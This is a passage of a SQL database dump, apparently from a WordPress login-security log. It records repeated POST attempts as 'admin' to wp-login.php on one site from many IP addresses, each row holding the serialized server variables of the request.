zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57348\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.120.130\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747020960.741375;s:12:\"REQUEST_TIME\";i:1747020960;}}','198.54.120.130',0,'2025-05-12 09:06:02','1970-01-01 00:00:00'),(95597,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"95\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"13451\";s:11:\"REMOTE_ADDR\";s:14:\"20.245.238.242\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747021280.2941041;s:12:\"REQUEST_TIME\";i:1747021280;}}','20.245.238.242',0,'2025-05-12 09:11:22','1970-01-01 00:00:00'),(95598,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:4:\"4478\";s:11:\"REMOTE_ADDR\";s:12:\"45.158.14.18\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747021599.4628;s:12:\"REQUEST_TIME\";i:1747021599;}}','45.158.14.18',0,'2025-05-12 09:16:41','1970-01-01 00:00:00'),(95599,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39730\";s:11:\"REMOTE_ADDR\";s:11:\"66.29.153.5\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747021925.3243389;s:12:\"REQUEST_TIME\";i:1747021925;}}','66.29.153.5',0,'2025-05-12 09:22:06','1970-01-01 00:00:00'),(95600,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40550\";s:11:\"REMOTE_ADDR\";s:13:\"83.149.93.194\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747022245.0927429;s:12:\"REQUEST_TIME\";i:1747022245;}}','83.149.93.194',0,'2025-05-12 09:27:26','1970-01-01 00:00:00'),(95601,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43030\";s:11:\"REMOTE_ADDR\";s:12:\"51.81.240.50\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747022577.2182829;s:12:\"REQUEST_TIME\";i:1747022577;}}','51.81.240.50',0,'2025-05-12 09:32:58','1970-01-01 00:00:00'),(95602,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47102\";s:11:\"REMOTE_ADDR\";s:15:\"104.219.248.236\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747022903.622683;s:12:\"REQUEST_TIME\";i:1747022903;}}','104.219.248.236',0,'2025-05-12 09:38:25','1970-01-01 00:00:00'),(95603,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47524\";s:11:\"REMOTE_ADDR\";s:12:\"62.60.160.33\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747023228.37868;s:12:\"REQUEST_TIME\";i:1747023228;}}','62.60.160.33',0,'2025-05-12 09:43:50','1970-01-01 00:00:00'),(95604,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41660\";s:11:\"REMOTE_ADDR\";s:12:\"68.65.122.41\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747023554.8226349;s:12:\"REQUEST_TIME\";i:1747023554;}}','68.65.122.41',0,'2025-05-12 09:49:16','1970-01-01 00:00:00'),(95605,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44464\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.126.68\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747023876.7179351;s:12:\"REQUEST_TIME\";i:1747023876;}}','198.54.126.68',0,'2025-05-12 09:54:38','1970-01-01 00:00:00'),(95606,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45516\";s:11:\"REMOTE_ADDR\";s:15:\"103.169.160.163\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747024210.0583191;s:12:\"REQUEST_TIME\";i:1747024210;}}','103.169.160.163',0,'2025-05-12 10:00:11','1970-01-01 